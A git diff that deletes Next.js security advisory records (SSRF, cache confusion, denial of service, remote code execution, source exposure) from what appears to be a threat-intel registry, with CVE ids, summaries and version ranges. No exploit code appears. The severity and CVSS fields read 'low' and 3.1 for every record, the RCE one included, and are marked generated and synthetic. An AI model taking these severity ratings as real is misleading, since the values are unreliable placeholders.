-    "introduced=15.0.0, fixed<15.4.5"
-  ],
-  "fixed_versions": [
-    "14.2.31",
-    "15.4.5"
-  ],
-  "package_name": "next",
-  "render_markdown": true,
-  "case_path": "07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-55173.md",
-  "secure_code_topics": [
-    "authz-server-side-recheck",
-    "proxy-trust-boundary",
-    "token-cookie-storage"
-  ],
-  "status": "generated",
-  "triage_reasons": [],
-  "verification_status": "triage-manual",
-  "verification_mode": "synthetic",
-  "last_verified_at": null,
-  "last_run_id": null,
-  "evidence_bundle": null,
-  "browser_evidence": {
-    "required": false,
-    "present": false,
-    "refs": []
-  },
-  "repro_profile_id": "xss-generic",
-  "artifact_mode": "synthetic",
-  "blocked_reason": null,
-  "metadata": {
-    "source_names": [
-      "OSV Next.js"
-    ],
-    "source_kinds": [
-      "osv-batch"
-    ],
-    "candidate_count": 1
-  }
-}
diff --git a/08-threat-intel/registry/advisories/nextjs--CVE-2025-57752.json b/08-threat-intel/registry/advisories/nextjs--CVE-2025-57752.json
deleted file mode 100644
index 3ca398de..00000000
--- a/08-threat-intel/registry/advisories/nextjs--CVE-2025-57752.json
+++ /dev/null
@@ -1,76 +0,0 @@
-{
-  "canonical_id": "nextjs--CVE-2025-57752",
-  "system_id": "nextjs",
-  "display_name": "Next.js",
-  "category": "frameworks",
-  "advisory_mode": "core",
-  "title": "Next.js Affected by Cache Key Confusion for Image Optimization API Routes",
-  "summary": "A vulnerability in Next.js Image Optimization has been fixed in v15.4.5 and v14.2.31. When images returned from API routes vary based on request headers (such as `Cookie` or `Authorization`), these responses could be incorrectly cached and served to unauthorized users due to a cache key confusion bug.\n\nAll users are encouraged to upgrade if they use API routes to serve images that depend on request headers and have image optimization enabled.\n\nMore details at [Vercel Changelog](https://vercel.com/changelog/cve-2025-57752)",
-  "published_at": "2025-08-29T22:06:22Z",
-  "updated_at": "2026-02-04T02:50:08.291668Z",
-  "severity": "low",
-  "cvss_score": 3.1,
-  "exploit_status": "unknown",
-  "source_confidence": "official",
-  "official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-g5qg-72qw-gw5v",
-  "secondary_source_urls": [
-    "https://nvd.nist.gov/vuln/detail/CVE-2025-57752",
-    "https://github.com/vercel/next.js/pull/82114",
-    "https://github.com/vercel/next.js/commit/6b12c60c61ee80cb0443ccd20de82ca9b4422ddd",
-    "https://github.com/vercel/next.js",
-    "https://vercel.com/changelog/cve-2025-57752"
-  ],
-  "aliases": [
-    "CVE-2025-57752",
-    "GHSA-g5qg-72qw-gw5v"
-  ],
-  "cve_ids": [
-    "CVE-2025-57752"
-  ],
-  "ghsa_ids": [
-    "GHSA-g5qg-72qw-gw5v"
-  ],
-  "osv_ids": [
-    "GHSA-g5qg-72qw-gw5v"
-  ],
-  "affected_versions": [
-    "introduced=0.9.9, fixed<14.2.31",
-    "introduced=15.0.0, fixed<15.4.5"
-  ],
-  "fixed_versions": [
-    "14.2.31",
-    "15.4.5"
-  ],
-  "package_name": "next",
-  "render_markdown": true,
-  "case_path": "07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-57752.md",
-  "secure_code_topics": [
-    "authz-server-side-recheck",
-    "proxy-trust-boundary",
-    "token-cookie-storage"
-  ],
-  "status": "generated",
-  "triage_reasons": [],
-  "verification_status": "triage-manual",
-  "verification_mode": "synthetic",
-  "last_verified_at": null,
-  "last_run_id": null,
-  "evidence_bundle": null,
-  "browser_evidence": {
-    "required": false,
-    "present": false,
-    "refs": []
-  },
-  "repro_profile_id": "proxy-boundary-generic",
-  "artifact_mode": "synthetic",
-  "blocked_reason": null,
-  "metadata": {
-    "source_names": [
-      "OSV Next.js"
-    ],
-    "source_kinds": [
-      "osv-batch"
-    ],
-    "candidate_count": 1
-  }
-}
diff --git a/08-threat-intel/registry/advisories/nextjs--CVE-2025-57822.json b/08-threat-intel/registry/advisories/nextjs--CVE-2025-57822.json
deleted file mode 100644
index 7b230d34..00000000
--- a/08-threat-intel/registry/advisories/nextjs--CVE-2025-57822.json
+++ /dev/null
@@ -1,76 +0,0 @@
-{
-  "canonical_id": "nextjs--CVE-2025-57822",
-  "system_id": "nextjs",
-  "display_name": "Next.js",
-  "category": "frameworks",
-  "advisory_mode": "core",
-  "title": "Next.js Improper Middleware Redirect Handling Leads to SSRF",
-  "summary": "A vulnerability in **Next.js Middleware** has been fixed in **v14.2.32** and **v15.4.7**. The issue occurred when request headers were directly passed into `NextResponse.next()`. In self-hosted applications, this could allow Server-Side Request Forgery (SSRF) if certain sensitive headers from the incoming request were reflected back into the response.\n\nAll users implementing custom middleware logic in self-hosted environments are strongly encouraged to upgrade and verify correct usage of the `next()` function.\n\nMore details at [Vercel Changelog](https://vercel.com/changelog/cve-2025-57822)",
-  "published_at": "2025-08-29T21:33:09Z",
-  "updated_at": "2026-02-04T04:20:45.658010Z",
-  "severity": "low",
-  "cvss_score": 3.1,
-  "exploit_status": "unknown",
-  "source_confidence": "official",
-  "official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-4342-x723-ch2f",
-  "secondary_source_urls": [
-    "https://nvd.nist.gov/vuln/detail/CVE-2025-57822",
-    "https://github.com/vercel/next.js/commit/9c9aaed5bb9338ef31b0517ccf0ab4414f2093d8",
-    "https://github.com/vercel/next.js",
-    "https://vercel.com/changelog/cve-2025-57822"
-  ],
-  "aliases": [
-    "CVE-2025-57822",
-    "GHSA-4342-x723-ch2f"
-  ],
-  "cve_ids": [
-    "CVE-2025-57822"
-  ],
-  "ghsa_ids": [
-    "GHSA-4342-x723-ch2f"
-  ],
-  "osv_ids": [
-    "GHSA-4342-x723-ch2f"
-  ],
-  "affected_versions": [
-    "introduced=0.9.9, fixed<14.2.32",
-    "introduced=15.0.0-canary.0, fixed<15.4.7"
-  ],
-  "fixed_versions": [
-    "14.2.32",
-    "15.4.7"
-  ],
-  "package_name": "next",
-  "render_markdown": true,
-  "case_path": "07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-57822.md",
-  "secure_code_topics": [
-    "authz-server-side-recheck",
-    "proxy-trust-boundary",
-    "token-cookie-storage",
-    "ssrf-url-validation"
-  ],
-  "status": "generated",
-  "triage_reasons": [],
-  "verification_status": "triage-manual",
-  "verification_mode": "synthetic",
-  "last_verified_at": null,
-  "last_run_id": null,
-  "evidence_bundle": null,
-  "browser_evidence": {
-    "required": false,
-    "present": false,
-    "refs": []
-  },
-  "repro_profile_id": "ssrf-generic",
-  "artifact_mode": "synthetic",
-  "blocked_reason": null,
-  "metadata": {
-    "source_names": [
-      "OSV Next.js"
-    ],
-    "source_kinds": [
-      "osv-batch"
-    ],
-    "candidate_count": 1
-  }
-}
diff --git a/08-threat-intel/registry/advisories/nextjs--CVE-2025-59471.json b/08-threat-intel/registry/advisories/nextjs--CVE-2025-59471.json
deleted file mode 100644
index 725abfd8..00000000
--- a/08-threat-intel/registry/advisories/nextjs--CVE-2025-59471.json
+++ /dev/null
@@ -1,77 +0,0 @@
-{
-  "canonical_id": "nextjs--CVE-2025-59471",
-  "system_id": "nextjs",
-  "display_name": "Next.js",
-  "category": "frameworks",
-  "advisory_mode": "core",
-  "title": "Next.js self-hosted applications vulnerable to DoS via Image Optimizer remotePatterns configuration",
-  "summary": "A DoS vulnerability exists in self-hosted Next.js applications that have `remotePatterns` configured for the Image Optimizer. The image optimization endpoint (`/_next/image`) loads external images entirely into memory without enforcing a maximum size limit, allowing an attacker to cause out-of-memory conditions by requesting optimization of arbitrarily large images. This vulnerability requires that `remotePatterns` is configured to allow image optimization from external domains and that the attacker can serve or control a large image on an allowed domain.\n\nStrongly consider upgrading to 15.5.10 and 16.1.5 to reduce risk and prevent availability issues in Next applications.",
-  "published_at": "2026-01-27T19:18:25Z",
-  "updated_at": "2026-02-10T01:28:46.973023Z",
-  "severity": "low",
-  "cvss_score": 3.1,
-  "exploit_status": "unknown",
-  "source_confidence": "official",
-  "official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-9g9p-9gw9-jx7f",
-  "secondary_source_urls": [
-    "https://nvd.nist.gov/vuln/detail/CVE-2025-59471",
-    "https://github.com/vercel/next.js/commit/500ec83743639addceaede95e95913398975156c",
-    "https://github.com/vercel/next.js/commit/e5b834d208fe0edf64aa26b5d76dcf6a176500ec",
-    "https://github.com/vercel/next.js",
-    "https://github.com/vercel/next.js/releases/tag/v15.5.10",
-    "https://github.com/vercel/next.js/releases/tag/v16.1.5"
-  ],
-  "aliases": [
-    "CVE-2025-59471",
-    "GHSA-9g9p-9gw9-jx7f"
-  ],
-  "cve_ids": [
-    "CVE-2025-59471"
-  ],
-  "ghsa_ids": [
-    "GHSA-9g9p-9gw9-jx7f"
-  ],
-  "osv_ids": [
-    "GHSA-9g9p-9gw9-jx7f"
-  ],
-  "affected_versions": [
-    "introduced=10.0.0, fixed<15.5.10",
-    "introduced=15.6.0-canary.0, fixed<16.1.5"
-  ],
-  "fixed_versions": [
-    "15.5.10",
-    "16.1.5"
-  ],
-  "package_name": "next",
-  "render_markdown": true,
-  "case_path": "07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-59471.md",
-  "secure_code_topics": [
-    "authz-server-side-recheck",
-    "proxy-trust-boundary",
-    "token-cookie-storage"
-  ],
-  "status": "generated",
-  "triage_reasons": [],
-  "verification_status": "triage-manual",
-  "verification_mode": "synthetic",
-  "last_verified_at": null,
-  "last_run_id": null,
-  "evidence_bundle": null,
-  "browser_evidence": {
-    "required": false,
-    "present": false,
-    "refs": []
-  },
-  "repro_profile_id": "proxy-boundary-generic",
-  "artifact_mode": "synthetic",
-  "blocked_reason": null,
-  "metadata": {
-    "source_names": [
-      "OSV Next.js"
-    ],
-    "source_kinds": [
-      "osv-batch"
-    ],
-    "candidate_count": 1
-  }
-}
diff --git a/08-threat-intel/registry/advisories/nextjs--CVE-2025-59472.json b/08-threat-intel/registry/advisories/nextjs--CVE-2025-59472.json
deleted file mode 100644
index eb8a1fe4..00000000
--- a/08-threat-intel/registry/advisories/nextjs--CVE-2025-59472.json
+++ /dev/null
@@ -1,74 +0,0 @@
-{
-  "canonical_id": "nextjs--CVE-2025-59472",
-  "system_id": "nextjs",
-  "display_name": "Next.js",
-  "category": "frameworks",
-  "advisory_mode": "core",
-  "title": "Next.js has Unbounded Memory Consumption via PPR Resume Endpoint ",
-  "summary": "A denial of service vulnerability exists in Next.js versions with Partial Prerendering (PPR) enabled when running in minimal mode. The PPR resume endpoint accepts unauthenticated POST requests with the `Next-Resume: 1` header and processes attacker-controlled postponed state data. Two closely related vulnerabilities allow an attacker to crash the server process through memory exhaustion:\n\n1. **Unbounded request body buffering**: The server buffers the entire POST request body into memory using `Buffer.concat()` without enforcing any size limit, allowing arbitrarily large payloads to exhaust available memory.\n\n2. **Unbounded decompression (zipbomb)**: The resume data cache is decompressed using `inflateSync()` without limiting the decompressed output size. A small compressed payload can expand to hundreds of megabytes or gigabytes, causing memory exhaustion.\n\nBoth attack vectors result in a fatal V8 out-of-memory error (`FATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory`) causing the Node.js process to terminate. The zipbomb variant is particularly dangerous as it can bypass reverse proxy request size limits while still causing large memory allocation on the server.\n\nTo be affected, an application must run with `experimental.ppr: true` or `cacheComponents: true` configured along with the NEXT_PRIVATE_MINIMAL_MODE=1 environment variable.\n\nStrongly consider upgrading to 15.6.0-canary.61 or 16.1.5 to reduce risk and prevent availability issues in Next applications.",
-  "published_at": "2026-01-28T15:20:55Z",
-  "updated_at": "2026-02-06T13:13:43.709252Z",
-  "severity": "low",
-  "cvss_score": 3.1,
-  "exploit_status": "unknown",
-  "source_confidence": "official",
-  "official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-5f7q-jpqc-wp7h",
-  "secondary_source_urls": [
-    "https://nvd.nist.gov/vuln/detail/CVE-2025-59472",
-    "https://github.com/vercel/next.js",
-    "https://vercel.com/changelog/summaries-of-cve-2025-59471-and-cve-2025-59472"
-  ],
-  "aliases": [
-    "CVE-2025-59472",
-    "GHSA-5f7q-jpqc-wp7h"
-  ],
-  "cve_ids": [
-    "CVE-2025-59472"
-  ],
-  "ghsa_ids": [
-    "GHSA-5f7q-jpqc-wp7h"
-  ],
-  "osv_ids": [
-    "GHSA-5f7q-jpqc-wp7h"
-  ],
-  "affected_versions": [
-    "introduced=15.0.0-canary.0, fixed<15.6.0-canary.61",
-    "introduced=16.0.0-beta.0, fixed<16.1.5"
-  ],
-  "fixed_versions": [
-    "15.6.0-canary.61",
-    "16.1.5"
-  ],
-  "package_name": "next",
-  "render_markdown": true,
-  "case_path": "07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-59472.md",
-  "secure_code_topics": [
-    "authz-server-side-recheck",
-    "proxy-trust-boundary",
-    "token-cookie-storage"
-  ],
-  "status": "generated",
-  "triage_reasons": [],
-  "verification_status": "triage-manual",
-  "verification_mode": "synthetic",
-  "last_verified_at": null,
-  "last_run_id": null,
-  "evidence_bundle": null,
-  "browser_evidence": {
-    "required": false,
-    "present": false,
-    "refs": []
-  },
-  "repro_profile_id": "proxy-boundary-generic",
-  "artifact_mode": "synthetic",
-  "blocked_reason": null,
-  "metadata": {
-    "source_names": [
-      "OSV Next.js"
-    ],
-    "source_kinds": [
-      "osv-batch"
-    ],
-    "candidate_count": 1
-  }
-}
diff --git a/08-threat-intel/registry/advisories/nextjs--GHSA-5j59-xgg2-r9c4.json b/08-threat-intel/registry/advisories/nextjs--GHSA-5j59-xgg2-r9c4.json
deleted file mode 100644
index 208f207f..00000000
--- a/08-threat-intel/registry/advisories/nextjs--GHSA-5j59-xgg2-r9c4.json
+++ /dev/null
@@ -1,90 +0,0 @@
-{
-  "canonical_id": "nextjs--GHSA-5j59-xgg2-r9c4",
-  "system_id": "nextjs",
-  "display_name": "Next.js",
-  "category": "frameworks",
-  "advisory_mode": "core",
-  "title": "Next has a Denial of Service with Server Components - Incomplete Fix Follow-Up",
-  "summary": "It was discovered that the fix for [CVE-2025-55184](https://github.com/advisories/GHSA-2m3v-v2m8-q956) in React Server Components was incomplete and did not fully mitigate denial-of-service conditions across all payload types.  As a result, certain crafted inputs could still trigger excessive resource consumption. \n\nThis vulnerability affects React versions 19.0.2, 19.1.3, and 19.2.2, as well as frameworks that bundle or depend on these versions, including Next.js 13.x, 14.x, 15.x, and 16.x when using the App Router. The issue is tracked upstream as [CVE-2025-67779](https://www.cve.org/CVERecord?id=CVE-2025-67779).\n\nA malicious actor can send a specially crafted HTTP request to a Server Function endpoint that, when deserialized, causes the React Server Components runtime to enter an infinite loop. This can lead to sustained CPU consumption and cause the affected server process to become unresponsive, resulting in a denial-of-service condition in unpatched environments.",
-  "published_at": "2025-12-12T17:21:57Z",
-  "updated_at": "2026-02-04T02:46:38.768104Z",
-  "severity": "low",
-  "cvss_score": 3.1,
-  "exploit_status": "unknown",
-  "source_confidence": "official",
-  "official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-5j59-xgg2-r9c4",
-  "secondary_source_urls": [
-    "https://nvd.nist.gov/vuln/detail/CVE-2025-67779",
-    "https://github.com/vercel/next.js",
-    "https://nextjs.org/blog/security-update-2025-12-11",
-    "https://react.dev/blog/2025/12/11/denial-of-service-and-source-code-exposure-in-react-server-components",
-    "https://www.cve.org/CVERecord?id=CVE-2025-55184",
-    "https://www.facebook.com/security/advisories/cve-2025-67779"
-  ],
-  "aliases": [
-    "GHSA-5j59-xgg2-r9c4"
-  ],
-  "cve_ids": [],
-  "ghsa_ids": [
-    "GHSA-5j59-xgg2-r9c4"
-  ],
-  "osv_ids": [
-    "GHSA-5j59-xgg2-r9c4"
-  ],
-  "affected_versions": [
-    "introduced=13.3.1-canary.0, fixed<14.2.35",
-    "introduced=15.0.6, fixed<15.0.7",
-    "introduced=15.1.10, fixed<15.1.11",
-    "introduced=15.2.7, fixed<15.2.8",
-    "introduced=15.3.7, fixed<15.3.8",
-    "introduced=15.4.9, fixed<15.4.10",
-    "introduced=15.5.8, fixed<15.5.9",
-    "introduced=15.6.0-canary.59, fixed<15.6.0-canary.60",
-    "introduced=16.0.9, fixed<16.0.10",
-    "introduced=16.1.0-canary.17, fixed<16.1.0-canary.19"
-  ],
-  "fixed_versions": [
-    "14.2.35",
-    "15.0.7",
-    "15.1.11",
-    "15.2.8",
-    "15.3.8",
-    "15.4.10",
-    "15.5.9",
-    "15.6.0-canary.60",
-    "16.0.10",
-    "16.1.0-canary.19"
-  ],
-  "package_name": "next",
-  "render_markdown": true,
-  "case_path": "07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-5j59-xgg2-r9c4.md",
-  "secure_code_topics": [
-    "authz-server-side-recheck",
-    "proxy-trust-boundary",
-    "token-cookie-storage"
-  ],
-  "status": "generated",
-  "triage_reasons": [],
-  "verification_status": "triage-manual",
-  "verification_mode": "synthetic",
-  "last_verified_at": null,
-  "last_run_id": null,
-  "evidence_bundle": null,
-  "browser_evidence": {
-    "required": false,
-    "present": false,
-    "refs": []
-  },
-  "repro_profile_id": "proxy-boundary-generic",
-  "artifact_mode": "synthetic",
-  "blocked_reason": null,
-  "metadata": {
-    "source_names": [
-      "OSV Next.js"
-    ],
-    "source_kinds": [
-      "osv-batch"
-    ],
-    "candidate_count": 1
-  }
-}
diff --git a/08-threat-intel/registry/advisories/nextjs--GHSA-9qr9-h5gf-34mp.json b/08-threat-intel/registry/advisories/nextjs--GHSA-9qr9-h5gf-34mp.json
deleted file mode 100644
index db38f2be..00000000
--- a/08-threat-intel/registry/advisories/nextjs--GHSA-9qr9-h5gf-34mp.json
+++ /dev/null
@@ -1,83 +0,0 @@
-{
-  "canonical_id": "nextjs--GHSA-9qr9-h5gf-34mp",
-  "system_id": "nextjs",
-  "display_name": "Next.js",
-  "category": "frameworks",
-  "advisory_mode": "core",
-  "title": "Next.js is vulnerable to RCE in React flight protocol",
-  "summary": "A vulnerability affects certain React packages<sup>1</sup> for versions 19.0.0, 19.1.0, 19.1.1, and 19.2.0 and frameworks that use the affected packages, including Next.js 15.x and 16.x using the App Router. The issue is tracked upstream as [CVE-2025-55182](https://www.cve.org/CVERecord?id=CVE-2025-55182). \n\nFixed in:\nReact: 19.0.1, 19.1.2, 19.2.1\nNext.js: 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, 16.0.7, 15.6.0-canary.58, 16.1.0-canary.12+\n\nThe vulnerability also affects experimental canary releases starting with 14.3.0-canary.77. Users on any of the 14.3 canary builds should either downgrade to a 14.x stable release or 14.3.0-canary.76.\n\nAll users of stable 15.x or 16.x Next.js versions should upgrade to a patched, stable version immediately.\n\n<sup>1</sup> The affected React packages are:\n- react-server-dom-parcel\n- react-server-dom-turbopack\n- react-server-dom-webpack",
-  "published_at": "2025-12-03T19:07:11Z",
-  "updated_at": "2026-02-04T03:45:15.823345Z",
-  "severity": "low",
-  "cvss_score": 3.1,
-  "exploit_status": "unknown",
-  "source_confidence": "official",
-  "official_source_url": "https://github.com/facebook/react/security/advisories/GHSA-fv66-9v8q-g76r",
-  "secondary_source_urls": [
-    "https://github.com/vercel/next.js/security/advisories/GHSA-9qr9-h5gf-34mp",
-    "https://github.com/vitejs/vite-plugin-react/security/advisories/GHSA-fmh4-wr37-44fp",
-    "https://nvd.nist.gov/vuln/detail/CVE-2025-55182",
-    "https://github.com/vercel/next.js"
-  ],
-  "aliases": [
-    "GHSA-9qr9-h5gf-34mp"
-  ],
-  "cve_ids": [],
-  "ghsa_ids": [
-    "GHSA-9qr9-h5gf-34mp"
-  ],
-  "osv_ids": [
-    "GHSA-9qr9-h5gf-34mp"
-  ],
-  "affected_versions": [
-    "introduced=14.3.0-canary.77, fixed<15.0.5",
-    "introduced=15.1.0-canary.0, fixed<15.1.9",
-    "introduced=15.2.0-canary.0, fixed<15.2.6",
-    "introduced=15.3.0-canary.0, fixed<15.3.6",
-    "introduced=15.4.0-canary.0, fixed<15.4.8",
-    "introduced=15.5.0-canary.0, fixed<15.5.7",
-    "introduced=16.0.0-canary.0, fixed<16.0.7"
-  ],
-  "fixed_versions": [
-    "15.0.5",
-    "15.1.9",
-    "15.2.6",
-    "15.3.6",
-    "15.4.8",
-    "15.5.7",
-    "16.0.7"
-  ],
-  "package_name": "next",
-  "render_markdown": true,
-  "case_path": "07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-9qr9-h5gf-34mp.md",
-  "secure_code_topics": [
-    "authz-server-side-recheck",
-    "proxy-trust-boundary",
-    "token-cookie-storage",
-    "dependency-upgrade-policy"
-  ],
-  "status": "generated",
-  "triage_reasons": [],
-  "verification_status": "triage-manual",
-  "verification_mode": "synthetic",
-  "last_verified_at": null,
-  "last_run_id": null,
-  "evidence_bundle": null,
-  "browser_evidence": {
-    "required": false,
-    "present": false,
-    "refs": []
-  },
-  "repro_profile_id": "proxy-boundary-generic",
-  "artifact_mode": "synthetic",
-  "blocked_reason": null,
-  "metadata": {
-    "source_names": [
-      "OSV Next.js"
-    ],
-    "source_kinds": [
-      "osv-batch"
-    ],
-    "candidate_count": 1
-  }
-}
diff --git a/08-threat-intel/registry/advisories/nextjs--GHSA-h25m-26qc-wcjf.json b/08-threat-intel/registry/advisories/nextjs--GHSA-h25m-26qc-wcjf.json
deleted file mode 100644
index 37c36f11..00000000
--- a/08-threat-intel/registry/advisories/nextjs--GHSA-h25m-26qc-wcjf.json
+++ /dev/null
@@ -1,88 +0,0 @@
-{
-  "canonical_id": "nextjs--GHSA-h25m-26qc-wcjf",
-  "system_id": "nextjs",
-  "display_name": "Next.js",
-  "category": "frameworks",
-  "advisory_mode": "core",
-  "title": "Next.js HTTP request deserialization can lead to DoS when using insecure React Server Components",
-  "summary": "A vulnerability affects certain React Server Components packages for versions 19.0.x, 19.1.x, and 19.2.x and frameworks that use the affected packages, including Next.js 13.x, 14.x, 15.x, and 16.x using the App Router. The issue is tracked upstream as [CVE-2026-23864](https://github.com/facebook/react/security/advisories/GHSA-83fc-fqcc-2hmg).\n\nA specially crafted HTTP request can be sent to any App Router Server Function endpoint that, when deserialized, may trigger excessive CPU usage, out-of-memory exceptions, or server crashes. This can result in denial of service in unpatched environments.",
-  "published_at": "2026-01-28T15:38:01Z",
-  "updated_at": "2026-02-13T00:43:52.836085Z",
-  "severity": "low",
-  "cvss_score": 3.1,
-  "exploit_status": "unknown",
-  "source_confidence": "official",
-  "official_source_url": "https://github.com/facebook/react/security/advisories/GHSA-83fc-fqcc-2hmg",
-  "secondary_source_urls": [
-    "https://github.com/vercel/next.js/security/advisories/GHSA-h25m-26qc-wcjf",
-    "https://nvd.nist.gov/vuln/detail/CVE-2026-23864",
-    "https://github.com/vercel/next.js",
-    "https://vercel.com/changelog/summary-of-cve-2026-23864"
-  ],
-  "aliases": [
-    "GHSA-h25m-26qc-wcjf"
-  ],
-  "cve_ids": [],
-  "ghsa_ids": [
-    "GHSA-h25m-26qc-wcjf"
-  ],
-  "osv_ids": [
-    "GHSA-h25m-26qc-wcjf"
-  ],
-  "affected_versions": [
-    "introduced=13.0.0, fixed<15.0.8",
-    "introduced=15.1.1-canary.0, fixed<15.1.12",
-    "introduced=15.2.0-canary.0, fixed<15.2.9",
-    "introduced=15.3.0-canary.0, fixed<15.3.9",
-    "introduced=15.4.0-canary.0, fixed<15.4.11",
-    "introduced=15.5.1-canary.0, fixed<15.5.10",
-    "introduced=15.6.0-canary.0, fixed<15.6.0-canary.61",
-    "introduced=16.0.0-beta.0, fixed<16.0.11",
-    "introduced=16.1.0-canary.0, fixed<16.1.5"
-  ],
-  "fixed_versions": [
-    "15.0.8",
-    "15.1.12",
-    "15.2.9",
-    "15.3.9",
-    "15.4.11",
-    "15.5.10",
-    "15.6.0-canary.61",
-    "16.0.11",
-    "16.1.5"
-  ],
-  "package_name": "next",
-  "render_markdown": true,
-  "case_path": "07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-h25m-26qc-wcjf.md",
-  "secure_code_topics": [
-    "authz-server-side-recheck",
-    "proxy-trust-boundary",
-    "token-cookie-storage",
-    "dependency-upgrade-policy",
-    "deserialization-safety"
-  ],
-  "status": "generated",
-  "triage_reasons": [],
-  "verification_status": "triage-manual",
-  "verification_mode": "synthetic",
-  "last_verified_at": null,
-  "last_run_id": null,
-  "evidence_bundle": null,
-  "browser_evidence": {
-    "required": false,
-    "present": false,
-    "refs": []
-  },
-  "repro_profile_id": "deserialization-generic",
-  "artifact_mode": "synthetic",
-  "blocked_reason": null,
-  "metadata": {
-    "source_names": [
-      "OSV Next.js"
-    ],
-    "source_kinds": [
-      "osv-batch"
-    ],
-    "candidate_count": 1
-  }
-}
diff --git a/08-threat-intel/registry/advisories/nextjs--GHSA-mwv6-3258-q52c.json b/08-threat-intel/registry/advisories/nextjs--GHSA-mwv6-3258-q52c.json
deleted file mode 100644
index 569a061a..00000000
--- a/08-threat-intel/registry/advisories/nextjs--GHSA-mwv6-3258-q52c.json
+++ /dev/null
@@ -1,88 +0,0 @@
-{
-  "canonical_id": "nextjs--GHSA-mwv6-3258-q52c",
-  "system_id": "nextjs",
-  "display_name": "Next.js",
-  "category": "frameworks",
-  "advisory_mode": "core",
-  "title": "Next Vulnerable to Denial of Service with Server Components",
-  "summary": "A vulnerability affects certain React packages for versions 19.0.0, 19.0.1, 19.1.0, 19.1.1, 19.1.2, 19.2.0, and 19.2.1 and frameworks that use the affected packages, including Next.js 15.x and 16.x using the App Router. The issue is tracked upstream as [CVE-2025-55184](https://www.cve.org/CVERecord?id=CVE-2025-55184).\n\nA malicious HTTP request can be crafted and sent to any App Router endpoint that, when deserialized, can cause the server process to hang and consume CPU. This can result in denial of service in unpatched environments.",
-  "published_at": "2025-12-11T22:49:27Z",
-  "updated_at": "2026-02-04T03:55:54.855562Z",
-  "severity": "low",
-  "cvss_score": 3.1,
-  "exploit_status": "unknown",
-  "source_confidence": "official",
-  "official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-mwv6-3258-q52c",
-  "secondary_source_urls": [
-    "https://github.com/vercel/next.js",
-    "https://nextjs.org/blog/security-update-2025-12-11",
-    "https://www.cve.org/CVERecord?id=CVE-2025-55184"
-  ],
-  "aliases": [
-    "GHSA-mwv6-3258-q52c"
-  ],
-  "cve_ids": [],
-  "ghsa_ids": [
-    "GHSA-mwv6-3258-q52c"
-  ],
-  "osv_ids": [
-    "GHSA-mwv6-3258-q52c"
-  ],
-  "affected_versions": [
-    "introduced=13.3.0, fixed<14.2.34",
-    "introduced=15.0.0-canary.0, fixed<15.0.6",
-    "introduced=15.1.1-canary.0, fixed<15.1.10",
-    "introduced=15.2.0-canary.0, fixed<15.2.7",
-    "introduced=15.3.0-canary.0, fixed<15.3.7",
-    "introduced=15.4.0-canary.0, fixed<15.4.9",
-    "introduced=15.5.1-canary.0, fixed<15.5.8",
-    "introduced=15.6.0-canary.0, fixed<15.6.0-canary.59",
-    "introduced=16.0.0-beta.0, fixed<16.0.9",
-    "introduced=16.1.0-canary.0, fixed<16.1.0-canary.17"
-  ],
-  "fixed_versions": [
-    "14.2.34",
-    "15.0.6",
-    "15.1.10",
-    "15.2.7",
-    "15.3.7",
-    "15.4.9",
-    "15.5.8",
-    "15.6.0-canary.59",
-    "16.0.9",
-    "16.1.0-canary.17"
-  ],
-  "package_name": "next",
-  "render_markdown": true,
-  "case_path": "07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-mwv6-3258-q52c.md",
-  "secure_code_topics": [
-    "authz-server-side-recheck",
-    "proxy-trust-boundary",
-    "token-cookie-storage",
-    "dependency-upgrade-policy"
-  ],
-  "status": "generated",
-  "triage_reasons": [],
-  "verification_status": "triage-manual",
-  "verification_mode": "synthetic",
-  "last_verified_at": null,
-  "last_run_id": null,
-  "evidence_bundle": null,
-  "browser_evidence": {
-    "required": false,
-    "present": false,
-    "refs": []
-  },
-  "repro_profile_id": "proxy-boundary-generic",
-  "artifact_mode": "synthetic",
-  "blocked_reason": null,
-  "metadata": {
-    "source_names": [
-      "OSV Next.js"
-    ],
-    "source_kinds": [
-      "osv-batch"
-    ],
-    "candidate_count": 1
-  }
-}
diff --git a/08-threat-intel/registry/advisories/nextjs--GHSA-w37m-7fhw-fmv9.json b/08-threat-intel/registry/advisories/nextjs--GHSA-w37m-7fhw-fmv9.json
deleted file mode 100644
index 550c15cb..00000000
--- a/08-threat-intel/registry/advisories/nextjs--GHSA-w37m-7fhw-fmv9.json
+++ /dev/null
@@ -1,86 +0,0 @@
-{
-  "canonical_id": "nextjs--GHSA-w37m-7fhw-fmv9",
-  "system_id": "nextjs",
-  "display_name": "Next.js",
-  "category": "frameworks",
-  "advisory_mode": "core",
-  "title": "Next Server Actions Source Code Exposure ",
-  "summary": "A vulnerability affects certain React packages for versions 19.0.0, 19.0.1, 19.1.0, 19.1.1, 19.1.2, 19.2.0, and 19.2.1 and frameworks that use the affected packages, including Next.js 15.x and 16.x using the App Router. The issue is tracked upstream as [CVE-2025-55183](https://www.cve.org/CVERecord?id=CVE-2025-55183).\n\nA malicious HTTP request can be crafted and sent to any App Router endpoint that can return the compiled source code of [Server Functions](https://react.dev/reference/rsc/server-functions). This could reveal business logic, but would not expose secrets unless they were hardcoded directly into [Server Function](https://react.dev/reference/rsc/server-functions) code.",
-  "published_at": "2025-12-11T22:49:56Z",
-  "updated_at": "2026-02-04T02:51:40.627151Z",
-  "severity": "low",
-  "cvss_score": 3.1,
-  "exploit_status": "unknown",
-  "source_confidence": "official",
-  "official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-w37m-7fhw-fmv9",
-  "secondary_source_urls": [
-    "https://github.com/vercel/next.js",
-    "https://nextjs.org/blog/security-update-2025-12-11",
-    "https://www.cve.org/CVERecord?id=CVE-2025-55183"
-  ],
-  "aliases": [
